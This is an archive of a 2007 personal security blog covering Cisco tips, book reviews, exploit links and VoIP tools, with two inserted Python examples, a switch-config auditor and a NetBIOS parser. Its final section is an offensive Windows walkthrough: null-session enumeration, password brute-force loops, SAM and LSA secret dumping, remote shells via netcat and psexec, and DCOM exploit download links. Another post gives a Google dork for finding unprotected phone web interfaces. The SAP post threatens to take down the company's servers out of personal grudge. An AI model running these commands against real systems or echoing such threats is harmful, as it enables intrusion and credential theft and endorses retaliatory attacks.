Well, back to the main topic: I had been assigned to hack an application with 2 factor authentication. Damn, all I can say is it is very secure in terms of randomness in session IDs, hidden fields and encryption. There is no way I can break the application's login page, and the only thing I found is a jar file with lots of class files inside. Well, I know I can use a Java decompiler like jad to get the source code, but I did not, because I am concentrating more on finding vulnerabilities. Hmz.... I will continue with part 2 tomorrow. Firefox is a very cool tool to do web hacking. Install the following extensions, guys:

1. DOM Inspector
2. LiveHTTP Headers
3. Tamper Data
4. Modify Header
5. Firebug
6. Greasemonkey with XSS Assistant and Post Intercepter

The Hacka Man

Monday, September 3, 2007

Sam, Wireless Hacking, Updates

It's been a long time since I last updated my blog. I have been so busy these days with my current job, from planning to hacking. Also, I have been reading Rsnake's and Jeremiah's book XSS Exploit and Defence. It is a good book with great examples; however, there are some parts that I don't quite understand and I am still trying to catch up. Well, Sam, if you are reading this, check out the URL below for your wireless audit.

http://www.leetupload.com/tutorials/hackingspoonfed/part1

The Hacka Man

Saturday, August 11, 2007

PHP Application Firewall?

I was discussing application firewalls with Christ1an recently, and he actually presented me an application firewall written by pdp and maintained by .mario, which to me is very impressive. I actually looked at the source code and I must say that I don't understand a single shit. However, it was a nice effort from Christ1an and the guys devoting their time to develop a PHP application firewall. I am a network guy, I do web audits, but I am not good at coding or programming or source code review. Well, I am still learning; I want Christ1an on my team as I think he will be a very good addition to the company. Hey Christ1an, if you read this, please holla at me alright? I want to chat with you about career opportunities, you know how to reach me. Also, for guys who want a SQLi cheat sheet, check this out:

http://ha.ckers.org/sqlinjection

http://ferruh.mavituna.com/makale/sql-injection-cheatsheet

Check out the PHPIDS Team's IDS and their XSS database

http://php-ids.org

http://www.gnucitizen.org/xssdb/application.htm

The Hacka Man

Thursday, August 9, 2007

Cisco IOS 12.3T onwards with Tool Command Language

I was again reading the ioshints blog for Cisco tricks. I must say he is the master of Cisco products and configuration. I was reading about tclsh and I must say it is very handy, as I can write scripts and store them remotely, in NVRAM or in flash. Well, below are a few links where you can learn the basics of tclsh scripting.

http://ioshints.blogspot.com/2007/05/ios-tclsh-resources.html

http://ioshints.blogspot.com/2007/08/example-tcl-script-with-command-line.html



The Hacka Man

Tuesday, August 7, 2007

Exploiting FTP clients using PASV command

Finally, I am back home in Singapore again. I am so happy and my mood is starting to brighten again. I was researching web security and I came across Wade Alcorn's website. He found out that it was possible to launch a reverse shell and own an Asterisk server using inter-protocol exploitation. Also, check out BeEF, which is the equivalent of a Metasploit type of framework for web applications. Lastly, do check out the FTP PASV command manipulation, which allows FTP servers to cause vulnerable FTP clients to connect to other hosts.

"The paper discusses the FTP client flaw in detail and demonstrates how it can be used to attack common web browsers such as Konqueror, Opera and Firefox. Proof of concept code is presented that extends existing JavaScript port-scanning techniques to scan any TCP port from Firefox (even though it now implements "port banning" restrictions)."

http://www.bindshell.net/papers/ftppasv

The Hacka Man

Sunday, August 5, 2007

Michael Lynn Cisco IOS reverse shell exposed?

I was reading articles and looking at how Michael Lynn's exploit from Black Hat 2005 works. Nothing can be found, as the code was not leaked out, nor does anyone know much about the actual exploit. I was determined and I found something that relates to heap overflow in Cisco IOS. I think it's something similar to Michael Lynn's exploit using the IOS check_heaps() function. For more, check it out here: http://www.irmplc.com/content/pdfs/Cisco_IOS_Exploitation_Techniques.pdf

The Hacka Man

Attribute-Based XSS and Verifying if your webmail account is Hacked!

These days, I am just plain lazy. Maybe it is due to the mood that I am going back to Singapore, or maybe I am just depressed with certain issues here. But whatever it is, I am still doing a lot of research and penetration testing work. It's been a long time since I last visited Jeremiah's blog. Today, I just went through his blog and discovered two interesting topics that caught my eye. One is a new XSS vector known as Attribute-Based Cross-Site Scripting, and the other is How to check if your WebMail account has been hacked (Redux). Check it out at http://jeremiahgrossman.blogspot.com. He described a way to find out whether a hacker had hacked into your webmail, how the new XSS vector worked and how to prevent it. It is an absolute must read for all webappsec ppl.

The Hacka Man

Friday, July 27, 2007

Basic Cisco Switches Auditing Guidelines

1. Always use VLANs to segment the switch into separate broadcast domains (each switch port is already its own collision domain; it is broadcast traffic that VLANs limit). Remember that VLAN 1 is the default VLAN every port starts in and the one the switch uses for its own management and control traffic. Do not put user ports in VLAN 1, so that someone plugging into an unused port cannot talk to the rest of the network.

2. Avoid leaving ports in auto-trunking (dynamic) mode. The Dynamic Trunking Protocol lets an attacker negotiate a trunk and then hop between VLANs. Configure trunks statically with switchport mode trunk and switchport nonegotiate, set user ports to switchport mode access, and set the native VLAN of every trunk to an unused VLAN other than VLAN 1.

3. Make sure Spanning Tree Protocol is protected from attacks. Enable portfast with BPDU Guard on access ports (BPDU Filter is the alternative, but per-interface bpdufilter drops the very BPDUs that bpduguard would react to, so use one or the other on a given port), and enable root guard on ports that should never lead towards the root bridge.

4. Disable all unused ports on the switch (shutdown) so that nobody can plug into an unused port and communicate with the rest of the network.

5. Turn off VLAN Trunking Protocol (vtp mode transparent or off) if it is not in use. If it is required, VTP should be run with a password.

6. Review the network or configuration to limit thresholds for multicast and broadcast traffic on switch ports (storm-control).
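As an added example (not the post's own material), here is a small Python auditor that checks a switch's running-config text against the six points above. The config is constructed for the example, not taken from a real device, and the checks are the simple string matches an auditor would start with: VTP mode and password, static access or trunk mode plus nonegotiate on every live port, access VLAN and native VLAN not equal to 1, portfast paired with bpduguard, storm-control on access ports, and shutdown on unused ports.

```python
"""Audit a Cisco IOS switch running-config against the six guidelines above.
Added example; the config text below is constructed, not from a real switch."""
import re

SAMPLE_CONFIG = """\
vtp mode server
!
interface FastEthernet0/1
 switchport mode access
 switchport access vlan 10
 spanning-tree portfast
 spanning-tree bpduguard enable
 storm-control broadcast level 20.00
!
interface FastEthernet0/2
 switchport mode access
 switchport access vlan 1
!
interface FastEthernet0/3
 switchport mode dynamic desirable
!
interface FastEthernet0/4
 shutdown
!
interface GigabitEthernet0/1
 switchport trunk native vlan 1
 switchport mode trunk
!
interface GigabitEthernet0/2
 switchport trunk native vlan 999
 switchport mode trunk
 switchport nonegotiate
 spanning-tree guard root
!
"""


def split_config(config):
    """Return (global_lines, {interface_name: [stanza lines]})."""
    globals_, interfaces, current = [], {}, None
    for line in config.splitlines():
        if line.startswith("interface "):
            current = line.split(None, 1)[1]
            interfaces[current] = []
        elif line.startswith(" ") and current is not None:
            interfaces[current].append(line.strip())
        else:
            current = None
            if line and not line.startswith("!"):
                globals_.append(line.strip())
    return globals_, interfaces


def _vlan(lines, pattern, default=1):
    """Pull a VLAN number out of a stanza; VLAN 1 is the IOS default when unset."""
    for l in lines:
        m = re.match(pattern, l)
        if m:
            return int(m.group(1))
    return default


def audit(config):
    """Return a list of 'where: problem (rule N)' findings."""
    findings = []
    globals_, interfaces = split_config(config)
    vtp_off = any(l.startswith(("vtp mode transparent", "vtp mode off")) for l in globals_)
    if not vtp_off and not any(l.startswith("vtp password") for l in globals_):
        findings.append("global: VTP active without a password (rule 5)")
    for name, lines in interfaces.items():
        if "shutdown" in lines:
            continue                                   # unused port disabled (rule 4)
        is_trunk = "switchport mode trunk" in lines
        is_access = "switchport mode access" in lines
        if not (is_trunk or is_access):
            findings.append(f"{name}: no static mode, DTP can negotiate a trunk (rules 2, 4)")
            continue
        if is_access:
            if _vlan(lines, r"switchport access vlan (\d+)") == 1:
                findings.append(f"{name}: access port in VLAN 1 (rule 1)")
            if "spanning-tree portfast" in lines and "spanning-tree bpduguard enable" not in lines:
                findings.append(f"{name}: portfast without bpduguard (rule 3)")
            if not any(l.startswith("storm-control") for l in lines):
                findings.append(f"{name}: no storm-control threshold (rule 6)")
        if is_trunk:
            if "switchport nonegotiate" not in lines:
                findings.append(f"{name}: trunk still speaks DTP, add switchport nonegotiate (rule 2)")
            if _vlan(lines, r"switchport trunk native vlan (\d+)") == 1:
                findings.append(f"{name}: native VLAN is 1 (rule 2)")
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_CONFIG):
        print(finding)
```

Feed it the output of show running-config and it flags FastEthernet0/2 (VLAN 1, no storm-control), FastEthernet0/3 (dynamic mode), GigabitEthernet0/1 (native VLAN 1, DTP still on) and the password-less VTP server, while the shut port and the two correctly configured ports pass.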

The Hacka Man

Wednesday, July 25, 2007

Remote Command Exec (FireFox 2.0.0.5)

These days I am reading about web application hacking and trying out several different things. I happened to stumble across xs-sniper's page and read his post on owning most major browsers. There is a problem with cross-application browser scripting, where a flaw in URI handling allows remote command execution. Be sure to check out his post below:

http://xs-sniper.com/blog/remote-command-exec-firefox-2005/

The Hacka Man

Thursday, July 19, 2007

Thanks Chr1stian, Google Store flaw?

The other night I was talking to Chr1stian about XSS and Google. As we chatted the topic got more and more interesting. Anyway, Chr1stian is really a kind soul and a nice person to talk with. He taught me a lot of things I did not understand and guided me slowly through each step. Thank you, Chr1stian, for your patience; I can say that I now understand at least 90% of what you taught me. We also talked about how security does not make money, and about flaws in Google that Google did not correct even though he reported them.

I am sure that if I got a chance to test Google's applications I would find more flaws; however, because of my work schedule I do not really have the time to play around. Anyway, I still want to say thanks to Chr1stian. Don't forget our deal. :)

The Hacka Man

Tuesday, July 17, 2007

The Web Application Hackers Handbook: Discovering and Exploiting Security Flaws

Sorry for the lack of updates. Recently I have been reading a lot of books about web hacking and RFID and neglected blogging; the nature of my work means I have to report what I do every day. Just yesterday, though, I had a small chat with the author of the famous Burp proxy and realised that he has published a book called "The Web Application Hacker's Handbook: Discovering and Exploiting Security Flaws". In his words: "Our book aims to be the most comprehensive and deep guide to hacking web applications available. It covers numerous advanced topics like blind SQL/other injection, obscure logic flaws, attacking multi-stage authentication, new attacks against web users, ViewState tampering, decompilation of thick client components, source code review, use of bespoke automation, and many more." As usual I buy books to read, and this one is not to be missed. If someone can guarantee me that his book is good, given his experience developing tools and giving talks at Black Hat, then I will spend that kind of money on it. Well, let me know what you guys think?



The Hacka Man

Wednesday, July 4, 2007

IPSec VPN in PIX/ASA

For those of you who want to set up an IPsec VPN on a PIX/ASA firewall, below is a snapshot of the commands (PIX 6.x syntax; the peer address, pre-shared key and group passwords are masked). Crypto map entry 10 is a site-to-site tunnel to a fixed peer and entry 20 is a dynamic map for remote-access clients in the two vpngroups.

crypto ipsec transform-set hacker esp-aes-256 esp-sha-hmac
crypto dynamic-map dynmap 20 set transform-set hacker
crypto map hacker 10 ipsec-isakmp
crypto map hacker 10 match address IPSEC_hackers
crypto map hacker 10 set peer 111.111.111.111
crypto map hacker 10 set transform-set hacker
crypto map hacker 20 ipsec-isakmp dynamic dynmap
crypto map hacker client authentication LOCAL
crypto map hacker interface outside
isakmp enable outside
isakmp key ******** address 111.111.111.111 netmask 255.255.255.255 no-xauth no-config-mode
isakmp identity address
isakmp nat-traversal 20
isakmp policy 10 authentication pre-share
isakmp policy 10 encryption aes-256
isakmp policy 10 hash sha
isakmp policy 10 group 1
isakmp policy 10 lifetime 86400
isakmp policy 20 authentication pre-share
isakmp policy 20 encryption 3des
isakmp policy 20 hash md5
isakmp policy 20 group 2
isakmp policy 20 lifetime 86400
vpngroup crm525gp address-pool vpnpool
vpngroup crm525gp idle-time 1800
vpngroup crm525gp max-time 86400
vpngroup crm525gp password ********
vpngroup helpgrp address-pool vpnpool2
vpngroup helpgrp idle-time 1800
vpngroup helpgrp max-time 86400
vpngroup helpgrp password ********

A few things to check when auditing a configuration like this: the transform set named in each crypto map entry must be one that was actually defined (here hacker), otherwise the map entry is incomplete and the tunnel never comes up; isakmp policy 10 uses Diffie-Hellman group 1 (768-bit MODP), which is too weak for a modern deployment, so prefer group 2 or higher and drop the 3DES/MD5 fallback in policy 20 unless a peer really needs it; the IPSEC_hackers access-list must match exactly the traffic the peer expects, or phase 2 fails; and the vpngroup commands are PIX 6.x syntax, replaced on ASA 7.x and later by tunnel-group and group-policy.

The Hacka Man

DNS Pinning Exposed

Christ1an wrote a very detailed article on anti-anti-anti DNS pinning, or what you can simply call DNS pinning. For those who are still confused or find it complicated, the article explains it step by step with pictures. He covers the whole DNS pinning issue and how it is used to attack a web browser. Check it out here: http://christ1an.blogspot.com/2007/07/dns-pinning-explained.html

The Hacka Man

Monday, July 2, 2007

VoIP article ready soon

I am in the midst of writing my VoIP article for hakin9 magazine and, frankly speaking, I am very restless these days. Still, I am forcing myself to write it quickly so that it can be published soon, for VoIP auditors to comment on or for anyone interested in auditing VoIP services. The article is easy to understand and the techniques described are not hard to learn. A beginner will find it useful and interesting; an expert will not. I plan to write a more in-depth and advanced article in future if I have the resources and time. I will keep you updated once it is published.

The Hacka Man

Friday, June 29, 2007

Youtube's 40+ security vulnerabilities

The other night I was chatting with Christ1an about web security and realised that he was actually the one who "killed" YouTube. Some of you might already know that he discovered around 40+ vulnerabilities in YouTube and became famous overnight. Christ1an is based in Germany and is only a student, but heck, he is a guru in web security. He was interviewed by The Register and Google actually thanked him for his work.

Recently Christ1an launched http://planet-websecurity.org/ with the intention of bringing together similarly themed news and rants related to web security and displaying them in one place. Visit his blog via the link on the right side of my feed or check it out here.

The Hacka Man

Thursday, June 28, 2007

SAP

I always wanted to work for SAP because they pay huge money. I remember being interviewed by SAP back in Singapore. The first interview took at least 1-2 hours of conversation and I passed it. HR invited me for a second interview; however, this time the interviewer was crap. He asked all sorts of questions and I answered them succinctly, without beating around the bush. Either he did not get what I was trying to say or he was just plain talkative. I stood firmly by what I said, and he did not believe me, yet told me I was a perfect candidate for the position and looked like exactly what they were searching for. ALL BLOODY CRAP!!!! A bunch of liars. They truly antagonised me and I loathe them for that. I am a straight person: if you do not wish to hire me, that is fine, just tell me straight and I will understand. There is no need to make up a bunch of stories and be a coward.

Well, good luck to you, SAP. If I ever get a chance to audit your systems, I promise I will bring down all your SAP R/3 servers and any other external servers you have. Better protect your RFC or you will be OWNED!

The Hacka Man

Wednesday, June 27, 2007

Cisco show mem vs show processes memory sorted

To check CPU and memory usage on a router or firewall, I always issue show mem or show processes cpu to see what is driving the utilisation up. However, the output of show mem is not as useful as it looks. Looking at the ioshints blog, I found the same commands with a few tweaks that give sorted output, which is much better for troubleshooting because the heaviest process is listed first (the CPU sort key can be 5sec, 1min or 5min). See below:

show processes memory sorted

show processes cpu sorted 1min

show processes cpu sorted 5min

From cisco:

http://www.cisco.com/warp/public/63/showproc_cpu.html

http://www.cisco.com/warp/public/63/highcpu.html

For Cisco and Juniper command:

http://networking.ringofsaturn.com/Cisco/ciscojuniper.php

Tuesday, June 26, 2007

Designing and Implementing Linux Firewalls with QoS using netfilter, iproute2, NAT and l7-filter

I was invited by Lucian to review this book. Lucian sent me a copy and I was happy to receive it. I am someone who loves firewalls and security stuff, especially Linux and Cisco. This book is absolutely amazing. For beginners there is a lot of technical configuration to read and learn, and for experts it will guide you to topics that might interest you. I would really like to put this book into practice, but in my current situation I only have the time to read it and understand the concepts. I would rate this book 4.5/5 and recommend it to anyone who wants to learn firewalls at a low level.

VoIPong installation error

For those of you who try to install VoIPong and get errors like the ones below, the problem and the solution are as follows:

Murat Balaban writes:

>
> Hi Henrique,
>
> Which UNIX user is trying to run voipong? It seems a non-root
> user is running it, but does not have the sufficient privileges
> to open the ethernet device in promisc mode.
>
> Plus, you seem to have problems with the permissions of
> your modules directory. That directory should be owned by
> the same user running voipong.
>
> Thursday, May 31, 2007, 8:41:56 PM, you wrote:
>
> > Release 2.0, running on DINP70759 [Linux 2.4.25-klg #1
> > SMP Ter Abr 6 09:28:24 BRT 2004 i686]
>
> > (c) Murat Balaban http://www.enderunix.org/
> > 31/05/07 14:34:14: EnderUNIX VOIPONG Voice Over IP
> > Sniffer starting...
> > 31/05/07 14:34:14: Release 2.0 running on DINP70759
> > [Linux 2.4.25-klg #1 SMP Ter Abr 6 09:28:24 BRT 2004
> > i686]. (c) Murat Balaban http://www.enderunix.org/
> > [pid: 669]
> > 31/05/07 14:34:14: Default matching algorithm: lfp
> > 31/05/07 14:34:14: error:
> > securemod(/usr/local/etc/voipong/modules/modvocoder_pcma.so):
> > gid: got 50, expected 0
> > 31/05/07 14:34:14: error:
> > securemod(/usr/local/etc/voipong/modules/modvocoder_pcmu.so):
> > gid: got 50, expected 0
> > 31/05/07 14:34:14: loaded 0 module(s)
> > 31/05/07 14:34:14: libpcap start failure:
> > pcap_open_live: SIOCGIFHWADDR: No such device
>
> > 31/05/07 14:34:14: PID 669 [parent: 653]: exited with
> > code: 1. uptime: .
>
I had the same problems and solved them with this command:
sudo chown -R root:root /usr/local/etc/voipong/modules/modvocoder_pcm*
Also, for voipongnets, I created the file with:
touch /usr/local/etc/voipong/voipongnets
This solves the errors above.

Monday, June 25, 2007

Snom phones web interface exposed to public.

I was researching hard and soft phones and came across Snom VoIP phones. I do not know much about the phones, but a simple Google dork gave a bad result: default installations of the phone's web interface are not password protected. Check it out:

"(e.g. 0114930398330)" snom


Sunday, June 24, 2007

Hakin9 X Hackathology

This past week I was invited by hakin9 magazine to write an article about the latest hacking skills. I am still thinking about a topic. There are different types of hacks and I am in a dilemma choosing one. After pondering for some time, I think I would love to write about VoIP hacks. Because VoIP is a subset of network security, I think it is best to write about something I am good at. I have already set up a PBX server and now it is up to the guys at hakin9. The hakin9 team are a bunch of really cool and nice guys: they gave me a free copy of their magazine, and once my article is published they will also send me a copy of that issue. I will keep you updated on this. Let me know what you guys think?

Friday, June 22, 2007

David Litchfield new Oracle book

I have been wanting to learn more about Oracle hacking, and I would not say I am really good at Oracle security. I managed to set up an Oracle database server and do some simple exploitation and auditing; however, I know that to be good in that area I would need to spend most of my time trying to exploit it and learning the techniques for hacking the database. This past week it came to my attention that David Litchfield (Oracle security guru; Google him to find out more) has published a book called the Oracle Hacker's Handbook. I highly recommend anyone who loves Oracle security to buy it. Although I have not yet laid my hands on it, it will soon be on my bookshelf.

Monday, June 18, 2007

Using ftp with CUTCP telnet

Check out CUTCP

"Telnet is a program used to interactively log in to a remote computer. CUTCP telnet is a program that runs on a PC and is used in CIRCA labs and elsewhere on campus to log in to remote computers. This program can also function as an ftp server when you are logged in to a remote host. This means that you can use the host's ftp client to connect back to yourself. Here's how you do it:

1) First use telnet to log in to the remote host.

2) Press Alt/T. This will generate an ftp command with the proper network address and start the ftp client program on the interactive host.

3) When it asks for a name, enter anything.

4) When it asks for a password, press Alt/W. This will provide a hidden password to authenticate the connection.

Remember that when you have completed this connection, your PC is an ftp server, and the interactive host is running an ftp client. To transfer a file from the interactive host to your PC, use the put command. To transfer a file from the PC to the interactive host, use the get command."

Sunday, June 17, 2007

Regular Expressions with Cisco IOS

I was reading some Cisco stuff today. I knew long ago that Cisco IOS supports regular expressions to simplify search tasks and other uses, but back then I did not research it much. I just came across two sites that explain Cisco IOS regex in more detail:

http://www.cisco.com/univercd/cc/td/doc/product/software/ios122/122cgcr/ftersv_c/ftsappx/tcfaapre.htm

http://www.nil.com/ipcorner/EnhanceIOSUI/

Saturday, June 16, 2007

Cisco Router's DNS server to kill browser advertisement

I happened to stumble across the ioshints blog. He describes a way to use the Cisco router's own DNS server to block unwanted website advertisements. You can read more at: http://www.nil.com/ipcorner/RouterDNS/

Hacking Old Skoolz Windows

Port 135 (RPC endpoint mapper, client-server communications)

Port 139, 445 (authentication and file sharing over SMB)

Port 137, 138 (NetBIOS name service and datagram service: browser, name registration and lookup functions)



Query the port 135 endpoint mapper: it lists the registered RPC interfaces, including those used by Microsoft Outlook/Exchange and the Messenger service.


Nmap the server to see whether port 135 is open.

Run rpcscan or epdump against the server over TCP or UDP port 135.

If UDP ports 1028 and 1029 or TCP port 1025 are open (typical dynamically assigned RPC endpoints), run rpcscan over those ports as well.

Look for the IFIDs 12345778-1234-abcd-ef00-0123456789ab (LSA) and 12345778-1234-abcd-ef00-0123456789ac (SAMR). Both are present on all Windows NT-family systems, reachable over named pipes in an SMB session on TCP port 139 or 445.

If the SAMR interface is present, run walksam to glean user information.

If a valid username and password are available, run rpcclient (included in BackTrack); the LSARPC interface must be present.

Compromise the admin password with the brute-force tool WMICracker.

Use Remoxec to execute arbitrary commands.

Verify whether the server is vulnerable to the RPC DCOM exploits. If patches MS03-026 and MS03-039 are applied, these get you nothing. Otherwise download the exploits from:

http://packetstormsecurity.org/0307-exploits/dcom.c
http://packetstormsecurity.org/0307-exploits/DComExpl_UnixWin32.zip
http://packetstormsecurity.org/0307-exploits/rpcdcom.101.zip
http://packetstormsecurity.org/0307-exploits/oc192-dcom.c
http://examples.oreilly.com/networksa/tools/dcom-exploits.zip
http://www.securityfocus.com/bid/8205/exploit/


The DCOM interface can be exploited through:

TCP and UDP port 135 (through the RPC server service)
TCP ports 139 and 445 (through SMB and named pipes)
TCP port 593 (through COM Internet Services, if installed)

Use kaHt2 to get a remote shell.
Use the SPIKE msrpcfuzz fuzzer to stress test the interface.


-----------------------------------------------------------------------------------------

NetBIOS Name Service, UDP port 137

Dump the remote NetBIOS name table: nbtstat -A 192.168.1.152

Local Area Connection:
Node IpAddress: [192.168.1.20] Scope Id: []

           NetBIOS Remote Machine Name Table

       Name               Type         Status
    ---------------------------------------------
    CARAA          <00>  UNIQUE      Registered
    WORKGROUP      <00>  GROUP       Registered
    CARAA          <20>  UNIQUE      Registered
    WORKGROUP      <1E>  GROUP       Registered

    MAC Address = 00-0D-88-CB-30-0B

------------------------------------------------

Meaning of the suffix (the 16th byte of the NetBIOS name):

<00> unique  Workstation service (hostname)
<00> group   Domain or workgroup name
<03> unique  Messenger service running for that computer
<03> unique  Messenger service running for the logged-in user (the name is the username)
<20> unique  Server service running (file sharing)
<1D> group   Master browser name for the subnet
<1B> unique  Domain master browser name, identifies the PDC for that domain
<1E> group   Browser service elections

The name service itself has had a remotely exploitable bug: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0661
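As an added example (not part of the original post), here is Python that builds the node status query nbtstat -A sends to UDP 137 and decodes the response into the same table as above. The response packet is constructed to match the CARAA/WORKGROUP table rather than captured, the SUFFIXES table repeats the list above, the layout follows RFC 1002, and query_node_status() is only for use against a live host you are allowed to test.

```python
"""Build and decode NetBIOS node status (NBSTAT) traffic on UDP 137 (RFC 1002).
Added example: the response packet is constructed to match the nbtstat table above, not captured."""
import socket
import struct

# Meaning of the 16th byte (suffix), keyed by (suffix, is_group); same table as above
SUFFIXES = {
    (0x00, False): "Workstation service (hostname)",
    (0x00, True):  "Domain or workgroup name",
    (0x03, False): "Messenger service",
    (0x1B, False): "Domain master browser (PDC)",
    (0x1D, True):  "Master browser for the subnet",
    (0x1E, True):  "Browser service elections",
    (0x20, False): "Server service (file sharing)",
}

# Constructed sample: what a host CARAA in WORKGROUP would answer, as (name, suffix, is_group)
SAMPLE_NAMES = [("CARAA", 0x00, False), ("WORKGROUP", 0x00, True),
                ("CARAA", 0x20, False), ("WORKGROUP", 0x1E, True)]
SAMPLE_MAC = "00-0D-88-CB-30-0B"


def encode_wildcard_name():
    """First-level encoding of '*' padded with NULs to 16 bytes: each nibble becomes 'A'+nibble."""
    raw = b"*" + b"\x00" * 15
    encoded = b"".join(bytes([(b >> 4) + 0x41, (b & 0x0F) + 0x41]) for b in raw)
    return b"\x20" + encoded + b"\x00"          # label length 32, label, terminating zero


def build_node_status_request(trn_id=0x1234):
    """The query nbtstat -A sends: one question, type NBSTAT (0x21), class IN."""
    header = struct.pack(">HHHHHH", trn_id, 0x0000, 1, 0, 0, 0)
    return header + encode_wildcard_name() + struct.pack(">HH", 0x0021, 0x0001)


def build_node_status_response(names, mac, trn_id=0x1234):
    """A NODE STATUS RESPONSE, used here as offline input for the parser."""
    header = struct.pack(">HHHHHH", trn_id, 0x8400, 0, 1, 0, 0)   # response, authoritative, 1 answer
    entries = b"".join(
        name.encode("ascii").ljust(15, b" ") + bytes([suffix])
        + struct.pack(">H", (0x8000 if is_group else 0) | 0x0400)   # NAME_FLAGS: G bit, ACT bit
        for name, suffix, is_group in names)
    stats = bytes.fromhex(mac.replace("-", "")) + b"\x00" * 40        # UNIT_ID (MAC), then counters
    rdata = bytes([len(names)]) + entries + stats
    return (header + encode_wildcard_name()
            + struct.pack(">HHIH", 0x0021, 0x0001, 0, len(rdata)) + rdata)


def parse_node_status_response(pkt):
    """Decode the name table and MAC address out of a NODE STATUS RESPONSE."""
    trn_id, flags, qdcount, ancount, nscount, arcount = struct.unpack_from(">HHHHHH", pkt, 0)
    if not flags & 0x8000 or ancount != 1:
        raise ValueError("not a node status response")
    off = 12
    while pkt[off]:                                  # skip the length-prefixed RR_NAME labels
        off += 1 + pkt[off]
    off += 1
    rr_type, rr_class, ttl, rdlen = struct.unpack_from(">HHIH", pkt, off)
    off += 10
    if rr_type != 0x0021:
        raise ValueError("unexpected RR type %#x" % rr_type)
    rdata = pkt[off:off + rdlen]
    num_names = rdata[0]
    names = []
    for i in range(num_names):                       # 18-byte NODE_NAME entries follow NUM_NAMES
        entry = rdata[1 + 18 * i:1 + 18 * (i + 1)]
        suffix = entry[15]
        name_flags = struct.unpack(">H", entry[16:18])[0]
        is_group = bool(name_flags & 0x8000)
        names.append({
            "name": entry[:15].rstrip(b" ").decode("ascii", "replace"),
            "suffix": suffix,
            "type": "GROUP" if is_group else "UNIQUE",
            "status": "Registered" if name_flags & 0x0400 else "Inactive",
            "meaning": SUFFIXES.get((suffix, is_group), "unknown"),
        })
    mac = rdata[1 + 18 * num_names:1 + 18 * num_names + 6]
    return {"names": names, "mac": "-".join("%02X" % b for b in mac)}


def query_node_status(host, timeout=2.0):
    """Send the request to a live host on UDP 137 (not called here; needs network access)."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_node_status_request(), (host, 137))
        data, _ = s.recvfrom(4096)
    return parse_node_status_response(data)


if __name__ == "__main__":
    result = parse_node_status_response(build_node_status_response(SAMPLE_NAMES, SAMPLE_MAC))
    for n in result["names"]:
        print(f"{n['name']:<15} <{n['suffix']:02X}>  {n['type']:<6}  {n['status']:<10}  {n['meaning']}")
    print("MAC Address =", result["mac"])
```

The point of decoding the flags rather than just printing the names is that the G bit tells UNIQUE from GROUP, which is what disambiguates the two <00> entries, and a <20> UNIQUE name is the quickest confirmation that the Server service (and so the 139/445 attack surface below) is up.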


NetBIOS Datagram Service UDP port 138
http://www.securityfocus.com/advisories/2556


NetBIOS Session Service, TCP port 139

Connect through a null session:

net use \\192.168.1.152\IPC$ "" /user:""
net view \\192.168.1.152

Use tools like enum, GetAcct and winfo to enumerate more info.


Brute force user passwords through the NetBIOS session service with tools like SMBCrack and SMB-AT, or use a Windows FOR loop to find the password.

1. Create a file credentials.txt with one password/username pair per line:

Password Username
"" Administrator
Password Administrator
Admin Administrator

2. Try each pair (%i is the password, %j the username; the header line is tried too and simply fails):

FOR /F "tokens=1,2*" %i in (credentials.txt) do net use \\192.168.1.152\IPC$ %i /user:%j

3. Run the NetBIOS Auditing Tool (nat) over the whole subnet, appending so that each host's result is kept:

FOR /L %i IN (1,1,254) DO nat -u userlist.txt -p passlist.txt 192.168.1.%i >> out.txt


Connect as a valid user:

Use smbclient to enumerate more info.
net use \\192.168.1.152\C$ * /user:scadmin   (prompts for the password)
net use \\192.168.1.152\C$ ronald3211 /user:scadmin
at \\192.168.1.152 00:04 c:\Windows\system32\cmd.exe   (schedules a command on the remote host; needs admin rights)

Modify and access registry keys using:
Regdmp.exe
Regini.exe
Reg.exe

Access the SAM database and LSA secrets with:
Pwdump5
Lsadump2



CIFS service on TCP and UDP port 445

SMB-AT to enumerate user and system info:
smbserverscan to scan for SMB-related ports.
smbgetserverinfo to get server info.
smbNAT to provide more details about the server.
smbdumpusers to enumerate users over ports 139 and 445:
smbdumpusers -i 192.168.1.152 -m 2 -P1

smbbf to run brute-force password-grinding attacks against both the NetBIOS and CIFS services:
smbbf -i 192.168.1.152 -p wordlist.txt -u users.txt -v -P1

With an admin username and password:
samrdump to list all usernames on the server
rpcdump to list all endpoint bindings

Registry key controlling null sessions: HKLM\SYSTEM\CurrentControlSet\Control\Lsa
RestrictAnonymous = 0 (no restriction), 1 (anonymous users cannot enumerate SAM accounts and shares) or 2 (no access at all without explicit anonymous permissions; Windows 2000 and later)

Use pwdump5 to dump the SAM password hashes.
Use netcat to open a shell on the remote OS.
Use psexec over port 139 or 445 to execute commands:
psexec \\192.168.1.152 -u Admin -p password -s cmd.exe


IIS buffer overflow

IIS 5.0 SSL remote exploit: use THCIISSLame.